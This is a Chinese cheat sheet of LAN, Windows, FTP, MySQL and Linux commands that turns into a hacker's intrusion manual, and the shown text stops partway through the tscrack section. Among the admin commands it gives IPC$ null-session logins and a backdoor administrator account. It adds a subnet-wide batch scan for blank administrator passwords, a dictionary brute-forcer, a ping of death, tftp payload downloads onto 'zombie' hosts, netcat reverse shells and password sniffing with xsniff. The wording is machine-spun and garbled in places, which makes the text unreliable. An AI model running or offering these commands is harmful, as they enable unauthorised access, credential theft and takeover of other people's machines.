局域网内命令大全

　　局域网络dos命令集

　　net use //ip/ipc$ " " /user:" " 创建IPC空连接

　　net use //ip/ipc$ "登陆密码" /user:"登录名" 创建IPC非空连接

　　net use h: //ip/c$ "登陆密码" /user:"登录名" 立即登录后投射另一方C：到当地为H:

　　net use h: //ip/c$ 登录后投射另一方C：到当地为H:

　　net use //ip/ipc$ /del 删掉IPC连接

　　net use h: /del 删掉投射另一方到当地的为H:的投射

　　net user 登录名 登陆密码/add 创建客户

　　net user g

　　st /active:yes 激话g

　　st客户

　　net user 查询有什么客户

　　net user 帐户名 查询账号的特性

　　net localgroup ***istrators 登录名/add 把“客户”加上到管理人员使得其具备访问权限,留意：***istrator后加s用单数

　　net start 查询打开了什么服务项目

　　net start 服务项目名 打开服务项目;(如:net start telnet，net start schedule)

　　net stop 服务项目名 终止某服务项目

　　net time //总体目标ip 查询另一方時间

　　net time //总体目标ip /set 设定当地电子计算机時间与“总体目标IP”服务器的数据同步,再加上主要参数/yes可取消确认信息内容

　　net view 查询本地局域网内打开了什么共享资源

　　net view //ip 查询另一方局域网络内打开了什么共享资源

　　net config 显示设备网络连接设置

　　net logoff 断开的共享资源

　　net pause 服务项目名 中止某服务项目

　　net send ip "文字信息内容" 向另一方发消息

　　net ver 局域网络内已经应用的数据连接种类和信息内容

　　net share 查询当地打开的共享资源

　　net share ipc$ 打开ipc$共享资源

　　net share ipc$ /del 删掉ipc$共享资源

　　net share c$ /del 删掉C：共享资源

　　net user g

　　st 12345 用g

　　st用户登陆完用将登陆密码改成12345

　　net password 登陆密码 变更系统软件用户名和密码

　　netstat -a 查询打开了什么端口号,常见netstat -an

　　netstat -n 查看端口的数据连接状况，常见netstat -an

　　netstat -v 查询已经开展的工作中

　　netstat -p 协议书名 例：netstat -p tcq/ip 查询某协议书应用状况(查询tcp/ip协议书应用状况)

　　netstat -s 查询已经应用的全部协议书应用状况

　　nbtstat -A ip 另一方136到139在其中一个端口号开过得话，就可查询另一方近期登录的登录名(03前的为登录名)-留意：主要参数-A要英文大写

　　tracert -主要参数ip(或主机名) 跟踪路由(数据文件)，主要参数：“-w数据”用以设定请求超时间距。

　　ping ip(或网站域名) 向另一方服务器推送默认设置尺寸为32字节数的数据信息，主要参数：“-l[空格符]数据文件尺寸”;“-n传送数据频次”;“-t”指一直ping。

　　ping -t -l 65550 ip 身亡之ping(推送超过64K的文档并一直ping就变成身亡之ping)

　　ipconfig (winipcfg) 用以windows NT及XP(windows 95 98)查询本地ip详细地址，ipconfig可以用主要参数“/all”表明所有配备信息内容

　　tlist -t 以树行目录表明过程(为系统软件的额外专用工具，默认设置是沒有安裝的，在安装文件的Support/tools文件夹名称内)

　　kill -F 过程名 加-F主要参数后强制性完毕某过程(为系统软件的额外专用工具，默认设置是沒有安裝的，在安装文件的Support/tools文件夹名称内)

　　del -F 文件夹名称 加-F主要参数后就可删掉只读文件,/AR、/AH、/AS、/AA各自表明删掉写保护、掩藏、系统软件、存档文件，/A-R、/A-H、/A-S、/A-A表明删掉除写保护、掩藏、系统软件、归档之外的文档。比如“DEL/AR *.*”表明删掉文件列表下全部只读文件，“DEL/A-S *.*”表明删掉文件列表下除安装文件之外的全部文档

　　#2 二：

　　del /S /Q 文件目录 或用：rmdir /s /Q 文件目录/S删除目录及文件目录下的全部根目录和文档。另外应用主要参数/Q 可撤销删掉实际操作时的系统软件确定就立即删掉。(二个指令功效同样)

　　move 本地磁盘/途径/要挪动的文件夹名称 储放挪动文档的途径/挪动后文件夹名称 挪动文档,用主要参数/y将取消确认挪动文件目录存有同样文档的提醒就立即遮盖

　　fc one.txt two.txt > 三秒t.txt 比照二个文档并把不同点輸出到三秒t.txt文件中，"> "和"> >" 是跳转指令

　　at id号 打开已申请注册的某一任务计划

　　at /delete 终止全部任务计划，用主要参数/yes则不用确定就立即终止

　　at id号/delete 终止某一已申请注册的任务计划

　　at 查询全部的任务计划

　　at //ip time 程序流程名(或一个指令) /r 在某時间运作另一方某程序流程并重启电子计算机

　　finger username @host 查询近期有什么用户登陆

　　telnet ip 端口号 远和登录网络服务器,默认设置端口号为23

　　open ip 联接到IP(属telnet登录后的指令)

　　telnet 在本机里立即输入telnet 将进到该设备的telnet

　　copy 途径/文件夹名称1 途径/文件夹名称2 /y 拷贝文档1到特定的文件目录为文档2，用主要参数/y就另外取消确认你需要改变一份现有文件目录文档

　　copy c:/srv.exe //ip/***$ 拷贝当地c:/srv.exe到另一方的***下

　　cppy 1st.jpg/b 2st.txt/a 三秒t.jpg 将2st.txt的內容藏匿到1st.jpg中转化成三秒t.jpg新的文档，注：2st.txt文件头能空三排，主要参数：/b指二进制文件，/a指ASCLL文件格式

　　copy //ip/***$/svv.exe c:/ 或:copy//ip/***$/*.* 拷贝另一方***i$共享资源下的srv.exe文件(全部文档)至当地C：

　　xcopy 要拷贝的文档或文件目录树 总体目标详细地址/路径名 拷贝文档和文件目录树，用主要参数/Y将不提醒遮盖同样文档

　　tftp -i 自身IP(用肉机作起点、跳板时这用肉机IP) get server.exe c:/server.exe 登录后，将“IP”的server.exe免费下载到总体目标服务器c:/server.exe 主要参数：-i意指二进制方式传输，如传输exe文件时要，如不用-i 则以ASCII方式(传输文本文档方式)开展传输

　　tftp -i 另一方IP put c:/server.exe 登录后，提交当地c:/server.exe至服务器

　　ftp ip 端口号 用以文件上传至网络服务器或开展文档实际操作，默认设置端口号为21。bin指用二进制方法传输(可执行程序进);默认设置为ASCII文件格式传输(文本文档时)

　　route print 表明出IP路由器，将关键表明IP地址Network addres，子网掩码Netmask，网关地址Gateway addres，插口详细地址Interface

　　arp 查询和解决ARP缓存文件，ARP是姓名解析的含意，承担把一个IP分析成一个物理学性的MAC地址。arp -a将表明出所有信息内容

　　start 程序流程名或指令/max 或/min 新开业一个新页面并利润最大化(降到最低)运作某程序流程或指令

　　mem 查看cpu应用状况

　　attrib 文件夹名称(路径名) 查询某文档(文件目录)的特性

　　attrib 文件夹名称-A -R -S -H 或 A R S H 除掉(加上)某文档的 归档，写保护，系统软件，掩藏 特性;用 则是加上为某特性

　　dir 查询文档，主要参数：/Q显示文件及文件目录属系统软件哪一个客户，/T:C表明文件创建時间，/T:A显示文件之前被浏览時间，/T:W之前被修改时间

　　date /t 、time /t 应用此参数即“DATE/T”、“TIME/T”将只表明当今日期和時间，而无须键入新日期和時间

　　set 特定系统变量名字=要分派给自变量的标识符 设定系统变量

　　set 表明当今全部的系统变量

　　set p(或其他标识符) 表明出当今以标识符p(或其他标识符)开始的全部系统变量

　　pause 中止批程序处理，并表明出：按照任意键再次....

　　if 在批程序处理中实行标准解决(大量表明见if指令及自变量)

　　goto 标识 将cmd.exe导向性到批程序处理含有标识的行(标识务必独立一行，且以灶具开头，比如：“：start”标识)

　　call 途径/批处理文件名 从批程序处理中启用另一个批程序处理 (大量表明见call /?)

　　for 对一组文档中的每一个文档实行某一特殊指令(大量表明见for指令及自变量)

　　echo on或off 开启或关掉echo，仅用echo不用主要参数则表明当今echo设定

　　echo 信息内容 在显示屏上表明出信息内容

　　echo 信息内容>> pass.txt 将"信息内容"储存到pass.txt文件中

　　findstr "Hello" aa.txt 在aa.txt文件中找寻字符串数组hello

　　find 文件夹名称 搜索某文档

　　title 文章标题名称 变更CMD对话框文章标题名称

　　color 颜色值 设定cmd控制面板市场前景和背景色;0=黑、1=蓝、2=绿、3=淡绿、4=红、5=紫、6=黄、7=白、8=灰、9=浅蓝、A=浅绿色、B=淡淡绿、C=浅红、D=浅紫、E=浅黄、F=洁白

　　prompt 名字 变更cmd.exe的表明的cmd(把C:/、D:/统一改成：EntSky/ )

　　#3 三：

　　ver 在DOS窗口下表明版本信息

　　winver 弹出来一个对话框表明版本信息(运行内存大孝系统版本、补丁包版本号、主机名)

　　format 本地磁盘/FS:种类 格式化磁盘,种类:FAT、FAT32、NTFS ,例：Format D: /FS:NTFS

　　md 路径名 建立文件目录

　　replace 源代码 要更换文档的文件目录 更换文档

　　ren 原文件夹名称 新文件夹名称 重新命名文件夹名称

　　tree 以树结构表明出文件目录，用主要参数-f 将列举第个文件夹名称中文件目录

　　type 文件夹名称 表明文本文档的內容

　　more 文件夹名称 逐屏表明輸出文档

　　doskey 要锁住的指令=字符

　　doskey 要开启指令= 为DOS出示的锁住指令(编写cmd，再次启用win2k指令，并建立宏)。如：锁住dir命令：doskey dir=entsky (不能用doskey dir=dir);开启：doskey dir=

　　taskmgr 调成资源管理器

　　chkdsk /F D: 查验硬盘D并表明情况汇报;加主要参数/f并修复磁盘上的不正确

　　tlntadmn telnt服务项目admn,输入tlntadmn挑选3，再挑选8,就可以变更telnet服务项目默认设置端口号23为其他一切端口号

　　exit 撤出cmd.exe程序流程或现阶段，用主要参数/B则是撤出当今批处理命令脚本制作而不是cmd.exe

　　path 途径/可执行程序的文件夹名称 为可执行程序设定一个途径。

　　cmd 运行一个win2K指令表述对话框。主要参数：/eff、/en 关掉、打开指令拓展;更我详细描述见cmd /?

　　regedit /s 注册表文件名 导入注册表;主要参数/S指清静方式导进，无一切提醒;

　　regedit /e 注册表文件名 导出来注册表文件

　　cacls 文件夹名称 主要参数 表明或改动文档密钥管理目录(ACL)——对于NTFS文件格式时。主要参数：/D 登录名:设置回绝某客户浏览;/P 登录名:perm 更换特定客户的访问限制;/G 登录名:perm 授予特定客户访问限制;Perm 能够 是: N 无，R 载入，W 载入，C 变更(载入)，F 良好控制;例：cacls D:/test.txt /D p 设置d:/test.txt回绝p 客户浏览。

　　cacls 文件夹名称 查询文档的浏览用户权限目录

　　REM 文字內容 在批处理文件中加上注释

　　netsh 查询或变更本地连接配备状况

　　#4 四：

　　IIS服务项目指令：

　　iisreset /reboot 重新启动win2k电子计算机(但有提醒系统软件将重新启动信息内容发生)

　　iisreset /start或stop 运行(终止)全部Internet服务项目

　　iisreset /restart 终止随后重启全部Internet服务项目

　　iisreset /status 表明全部Internet服务项目情况

　　iisreset /enable或disable 在当地系统软件上开启(禁止使用)Internet服务项目的重启

　　iisreset /rebootonerror 当运行、终止或重启Internet服务项目时，若产生不正确将再次启动

　　iisreset /noforce 若停不下来Internet服务项目，将不容易强制性停止Internet服务项目

　　iisreset /timeout Val在抵达逾時间(秒)时，仍未终止Internet服务项目，若特定/rebootonerror主要参数，则电脑上可能再次启动。设定值为重启20秒，终止60秒，再次启动0秒。

　　FTP 指令：(后边有详细描述內容)

　　ftp的cmd文件格式为:

　　ftp -v -d -i -n -g[IP地址] -v 表明虚拟服务器的全部回应信息内容。

　　-d 应用调节方法。

　　-n 限定ftp的快速登录,即不应用.netrc文档。

　　-g 撤销全局性文件夹名称。

　　help [指令] 或 ?[指令] 查询指令表明

　　bye 或quit 停止服务器FTP过程,并撤出FTP管理方式.

　　pwd 列举当今远侧服务器文件目录

　　put 或send 当地文件夹名称[上传入服务器上的文件夹名称] 将当地一个文件传送至远侧服务器中

　　get 或recv [远程控制服务器文件夹名称] [免费下载到当地后的文件夹名称] 从远侧服务器中传输至当地服务器中

　　mget [remote-files] 从远侧服务器接受一批文档至当地服务器

　　mput local-files 将当地服务器中一批文件传送至远侧服务器

　　dir 或ls [remote-directory] [local-file] 列举当今远侧服务器文件目录中的文档.如果有本地文件,就将結果写至本地文件

　　ascii 设置以ASCII方法传输文档(缺省值)

　　bin 或image 设置以二进制方法传输文档

　　bell 每进行一次文件传送,警报提醒

　　cdup 返回上一级文件目录

　　close 终断与虚拟服务器的ftp对话(与open相匹配)

　　open host[port] 创建特定ftp服务器连接,可特定联接端口号

　　delete 删掉远侧服务器中的文档

　　mdelete [remote-files] 删掉一批文档

　　mkdir directory-name 在远侧服务器中创建文件目录

　　rename [from] [to] 更改远侧服务器中的文件夹名称

　　rmdir directory-name 删掉远侧服务器中的文件目录

　　status 表明当今FTP的情况

　　system 表明远侧软件系统种类

　　user user-name [password] [account] 再次以其他登录名登陆远侧服务器

　　open host [port] 再次创建一个新的联接

　　prompt 互动提醒方式

　　macdef 界定宏命令

　　lcd 更改当今当地服务器的工作中文件目录,假如默认设置,就转至当今客户的HOME文件目录

　　chmod 更改远侧服务器的文件权限

　　case 当以ON时,用MGET指令复制的文件夹名称到当地设备中,所有变换为英文字母

　　cd remote-dir 进到远程控制服务器文件目录

　　cdup 进到远程控制服务器文件目录的父文件目录

　　! 在当地机中实行互动shell，exit返回ftp自然环境,如!ls*.zip

　　#5 五：

　　MYSQL 指令：

　　mysql -h主机地址-u登录名 -p登陆密码 联接MYSQL;假如刚安裝好MYSQL，忠实用户root是沒有登陆密码的。

　　(例：mysql -h110.110.110.110 -Uroot -P123456

　　注:u与root能够 无需加空格符，其他也一样)

　　exit 撤出MYSQL

　　mysql*** -u登录名-p旧登陆密码password 密码 更改密码

　　grant select on 数据库查询.* to 登录名@登陆服务器identified by /"登陆密码/"; 提升新用户。(留意：和上边不一样，下边的由于是MYSQL自然环境中的指令，因此后边都带一个分号做为指令结束符)

　　show databases; 表明数据库查询目录。一开始时才2个数据库查询：mysql和test。mysql库很重要它里边有MYSQL的系统信息，大家修改密码和增加客户，事实上便是用这一库开展实际操作。

　　use mysql;

　　show tables; 表明库文件的数据分析表

　　describe 表名; 表明数据分析表的构造

　　create database 库名; 建库

　　use 库名;

　　create table 表名(字段名设置目录); 建表

　　drop database 库名;

　　drop table 表名; 删库和删表

　　delete from 表名; 将表格中纪录清除

　　select * from 表名; 表明表格中的纪录

　　mysqldump --opt school>school.bbb 备份数据数据库查询：(指令在DOS的//mysql//bin文件目录下实行);注解:将数据库查询school备份数据到school.bbb文档，school.bbb是一个文本文档，文件夹名称任取，开启看看你会出现探索与发现。

　　win2003系统软件下增加指令(好用部分)：

　　shutdown /主要参数 关掉或重新启动当地或远程控制服务器。

　　主要参数表明：/S 关掉服务器，/R 重新启动服务器，/T 数据 设置延迟的時间，范畴0～180秒中间，/A撤销启动，/M //IP 特定的远程控制服务器。

　　例：shutdown /r /t 0 马上重新启动当地服务器(无延迟)

　　taskill /主要参数 过程名或过程的pid 停止一个或好几个每日任务和过程。

　　主要参数表明：/PID 要停止过程的pid,可以用tasklist指令得到各过程的pid，/IM 要停止的过程的过程名，/F 强制性停止过程，/T 停止特定的过程及他所运行的子过程。

　　tasklist 表明当今运作在当地和远程控制服务器上的过程、服务项目、服务项目各过程的过程标志符(PID)。

　　主要参数表明：/M 列举当今过程载入的dll文档，/SVC 表明出每一个过程相匹配的服务项目，无主要参数时就只列举当今的过程。

　　#6 六：

　　Linux系统软件下基本上指令： 要区别英文大小写

　　uname 表明版本信息(同win2K的ver)

　　dir 表明文件列表文档,ls -al 表明包含隐藏文件(同win2K的dir)

　　pwd 查看当今所属的文件目录部位

　　cd cd ..返回上一层文件目录，留意cd 与..中间有空格符。cd /回到到网站根目录。

　　cat 文件夹名称 查询文档內容

　　cat >abc.txt 往abc.txt文件中写上內容。

　　more 文件夹名称 以一页一页的方法表明一个文本文档。

　　cp 拷贝文档

　　mv 挪动文档

　　rm 文件夹名称 删除文件夹，rm -a 路径名删除目录及根目录

　　mkdir 路径名 创建文件目录

　　rmdir 删掉根目录，文件目录内沒有文本文档。

　　chmod 设置档案资料或文件目录的存储管理权限

　　grep 在档案资料中搜索字符串数组

　　diff 档案资料较为

　　find 档案资料寻找

　　date 如今的日期、時间

　　who 查看现阶段与你应用同一台设备的人及其Login時间地址

　　w 查看现阶段上机操作者的详细信息

　　whoami 查询自身的账号名字

　　groups 查询别人的Group

　　passwd 修改密码

　　history 查询自身下完的指令

　　ps 表明过程情况

　　kill 终止某过程

　　gcc 网络黑客一般 用它来编译程序C语言写的文档

　　su 管理权限变换为特定使用人

　　telnet IP telnet联接另一方服务器(同win2K)，当发生bash$时就表明联接取得成功。

　　ftp ftp连接上某网络服务器(同win2K)

　　附：批处理命令与自变量

　　1：for指令及自变量 基本上文件格式：

　　FOR /主要参数%variable IN (set) DO command [command_parameters] %variable:特定一个单一英文字母可更换的主要参数，如：%i ，而特定一个自变量则用：%%i ，而启用自变量时要：%i% ，自变量是区别英文大小写的(%i 并不等于%I)。

　　批处理命令每一次能解决的自变量从%0—%9共10个，在其中%0默认设置给批处理文件名应用，%1默认设置为应用此批处理命令时键入的的第一个值，同样：%2—%9指键入的第二-9个值;例：net use //ip/ipc$ pass /user:user 中ip为%1,pass为%2 ,user为%3

　　(set):特定一个或一组文档，可使用通配符，如：(D:/user.txt)和(1 1 254)(1 -1 254),{ “(1 1 254)”第一个"1"指起始值，第二个"1"指增长率，第三个"254"指完毕值，即：从1到254;“(1 -1 254)”表明：即从254到1 }

　　command：特定对第个文档实行的指令，如：net use指令;如要实行好几个指令时，指令之间加：& 来分隔

　　command_parameters：为特殊指令特定主要参数或cmd电源开关

　　IN (set)：指在(set)中赋值;DO command ：指实行command

　　主要参数：/L 指用增加量方式{ (set)为增加量方式时};/F 指文本文件中持续赋值，直至取过截止{ (set)为文档时，如(d:/pass.txt)时}。

　　使用方法举例说明：

　　@echo off

　　echo 使用方法文件格式：test.bat *.*.* > test.txt

　　for /L %%G in (1 1 254) do echo %1.%%G >>test.txt & net use //%1.%%G /user:***istrator | find "指令取得成功进行" >>test.txt

　　存为test.bat 表明：对特定的一个C类子网的254个IP先后试创建***istrator登陆密码为空的IPC$联接，假如取得成功就把该IP存有test.txt中。

　　/L指的是增加量方式(即从1-254或254-1);键入的IP前边三位：*.*.*为批处理命令默认设置的%1;%%G 为自变量(ip的最终一位);& 用于分隔echo 和net use 这二个指令;| 指创建了ipc$后，在結果选用find查询是不是有"指令取得成功进行"信息内容;%1.%%G 为详细的IP地址;(1 1 254) 指起始值，增长率，结止值。

　　@echo off

　　echo 使用方法文件格式：ok.bat ip

　　FOR /F %%i IN (D:/user.dic) DO smb.exe %1 %%i D:/pass.dic 200

　　存为：ok.exe 表明：键入一个IP后，用词典文档d:/pass.dic来暴解d:/user.dic中的客户登陆密码，直至文档平均值取过截止。%%i为登录名;%1为键入的IP地址(默认设置)。

　　#7 七：

　　2：if指令及自变量 基本上文件格式：

　　IF [not] errorlevel 数据 指令句子 假如程序执行最终回到一个相当于或超过特定数据的撤出编号，特定标准为“真”。

　　例：IF errorlevel 0 指令 指程序运行后回到的数值0时，就值行后边的指令;IF not errorlevel 1 指令指程序运行最终回到的值并不等于1，就实行后边的指令。

　　0 指发觉并取得成功实行(真);1 指沒有发觉、没实行(假)。

　　IF [not] 字符串数组1==字符串数组2 指令句子 假如特定的文字字符串匹配(即：字符串数组1 相当于 字符串数组2)，就实行后边的指令。

　　例：“if "%2%"=="4" goto start”指：假如键入的第二个自变量为4时，实行后边的指令(留意：启用自变量时就%用户标识符%并加" ")

　　IF [not] exist 文件夹名称 指令句子 假如特定的文件夹名称存有，就实行后边的指令。

　　例：“if not nc.exe goto end”指：要是没有发觉nc.exe文件就跳到":end"标识处。

　　IF [not] errorlevel 数据 指令句子else 指令句子或IF [not] 字符串数组1==字符串数组2 指令句子else 指令句子或IF [not] exist 文件夹名称 指令句子else 指令句子 再加上：else 指令句子后指：当前边的标准不创立时，就指行else后边的指令。留意：else 务必与if 在同一行才合理。 当有del指令时要把del指令所有内容用< >括起來，由于del指令要独立一行时才可以实行，用上< >后就等因此独立一行了;比如：“if exist test.txt. else echo test.txt.missing ”，留意指令中的“.”

　　(二)系统软件外部命令(均需免费下载有关专用工具)：

　　1、瑞士军刀：nc.exe

　　主要参数表明：

　　-h 查询协助信息内容

　　-d 后台模式

　　-e prog程序流程跳转，一但联接就实行〔风险〕

　　-i secs延迟的间距

　　-l 监视方式，用以入站联接

　　-L 监视方式，联接天闭后依然再次监视，直至CTR C

　　-n IP地址，不能用网站域名

　　-o film纪录16进制的传送

　　-p[空格符]端口号 本地端口号

　　-r 任意当地及远程端口

　　-t 应用Telnet交互技术

　　-u P方式

　　-v 详尽輸出，用-vv将更详尽

　　-w数据timeout延迟间距

　　-z 将键入，輸出关闭(用以扫锚时)

　　基本上使用方法：

　　nc -nvv 192.168.0.1 80 联接到192.168.0.1服务器的80端口

　　nc -l -p 80 打开该设备的TCP 80端口并监视

　　nc -nvv -w2 -z 192.168.0.1 80-1024 扫锚192.168.0.1的80-1024端口号

　　nc -l -p 5354 -t -e c:winntsystem32cmd.exe 关联remote服务器的cmdshell在remote的TCP 5354端口号

　　nc -t -e c:winntsystem32cmd.exe 192.168.0.2 5354 梆定remote服务器的cmdshell并反方向联接192.168.0.2的5354端口号

　　高級使用方法：

　　nc -L -p 80 做为蜜獾用1：打开并不断地监视80端口，直至CTR C截止

　　nc -L -p 80 > c:/log.txt 做为蜜獾用2：打开并不断地监视80端口，直至CTR C,另外把結果輸出到c:/log.txt

　　nc -L -p 80 < c:/honeyport.txt 做为蜜獾用3-1：打开并不断地监视80端口，直至CTR C,并把c:/honeyport.txt中內容送进管路中，也可以具有传输文档功效

　　type.exe c:/honeyport | nc -L -p 80 做为蜜獾用3-2：打开并不断地监视80端口，直至CTR C,并把c:/honeyport.txt中內容送进管路中,也可以具有传输文档功效

　　本机里用：nc -l -p 该设备端口号

　　在另一方服务器上放：nc -e cmd.exe 该设备IP -p 该设备端口号*win2K

　　nc -e /bin/sh 该设备IP -p 该设备端口号*linux,unix 反方向联接提升另一方服务器的服务器防火墙

　　本机里用：nc -d -l -p 该设备端口号< 要传输的文件路径及名字

　　在另一方服务器上放：nc -vv 该设备IP 该设备端口号> 储放文档的途径及名字 传输文档到另一方服务器

　　备 注：

　　| 管路指令

　　< 或> 跳转指令。“<”，比如：tlntadmn < test.txt 指把test.txt的內容取值给tlntadmn指令

　　@ 表明实行@后边的指令，但不容易表明出去(后台管理实行);例：@dir c:/winnt >> d:/log.txt 意思是：后台管理实行dir，并把結果存有d:/log.txt中

　　>与>>的差别">"指：遮盖;">>"指：储存到(加上到)。

　　如：@dir c:/winnt >> d:/log.txt和@dir c:/winnt > d:/log.txt二个指令各自实行二次较为看：用>>的则是把二次的結果都储存了，而用：>则仅有一次的結果，是由于第二次的結果把第一次的遮盖了。

　　#8 八：

　　2、扫锚专用工具：xscan.exe

　　基本上文件格式

　　xscan -host <起止IP>[-<停止IP>] <检验新项目> [别的选择项] 扫锚"起止IP到停止IP"段的全部服务器信息内容

　　xscan -file <服务器目录文件夹名称> <检验新项目> [别的选择项] 扫锚"服务器IP目录文件夹名称"中的全部服务器信息内容

　　检验新项目

　　-active 检验服务器是不是生存

　　-os 检验远程控制电脑操作系统种类(根据NETBIOS和SNMP协议书)

　　-port 检验常见服务项目的端口号情况

　　-ftp 检验FTP弱口令

　　-p 检验FTP服务项目匿名用户写管理权限

　　-pop3 检验POP3-Server弱口令

　　-smtp 检验SMTP-Server系统漏洞

　　-sql 检验SQL-Server弱口令

　　-smb 检验NT-Server弱口令

　　-iis 检验IIS编号/编解码系统漏洞

　　-cgi 检验CGI系统漏洞

　　-nasl 载入Nessus进攻脚本制作

　　-all 检验之上全部新项目

　　其他选择项

　　-i 电源适配器序号 设定网络适配器, <电源适配器序号>可根据"-l"主要参数获得

　　-l 表明全部网络适配器

　　-v 表明详尽扫描仪进展

　　-p 绕过初始化失败的服务器

　　-o 绕过沒有检验到开放端口的服务器

　　-t 高并发进程总数,高并发服务器总数 特定较大高并发进程总数和高并发服务器总数, 默认设置总数为100,10

　　-log 文件夹名称 特定扫描仪汇报文件夹名称(后缀名为：TXT或HTML文件格式的文档)

　　使用方法实例

　　xscan -host 192.168.1.1-192.168.255.255 -all -active -p 检验192.168.1.1-192.168.255.255子网内服务器的全部系统漏洞，绕过无响应的服务器

　　xscan -host 192.168.1.1-192.168.255.255 -port -smb -t 150 -o 检验192.168.1.1-192.168.255.255子网内服务器的规范端口号情况，NT弱口令客户，较大高并发进程总数为150，绕过沒有检验到开放端口的服务器

　　xscan -file hostlist.txt -port -cgi -t 200,5 -v -o 检验“hostlist.txt”文档中列举的全部服务器的规范端口号情况，CGI系统漏洞，较大高并发进程总数为200，同一時刻数最多检验5台服务器，表明详尽检验进展，绕过沒有检验到开放端口的服务器

　　#9 九：

　　3、cmd方法嗅探工具: xsniff.exe

　　可捕捉局域网络内FTP/SMTP/POP3/HTTP协议书登陆密码

　　主要参数表明

　　-tcp 輸出TCP数据信息报

　　- p 輸出P数据信息报

　　-icmp 輸出ICMP数据信息报

　　-pass 过虑登陆密码信息内容

　　-hide 后台程序

　　-host 分析IP地址

　　-addr IP地址 过虑IP地址

　　-port 端口号 过虑端口号

　　-log 文件夹名称 将輸出储存到文档

　　-asc 以ASCII方式輸出

　　-hex 以16进制方式輸出

　　使用方法实例

　　xsniff.exe -pass -hide -log pass.log 后台程序网络嗅探登陆密码并将登陆密码信息内容储存在pass.log文件中

　　xsniff.exe -tcp - p -asc -addr 192.168.1.1 网络嗅探192.168.1.1并过虑tcp和p信息内容并以ASCII文件格式輸出

　　4、终端设备服务项目密码破解工具: tscrack.exe

　　主要参数表明

　　-h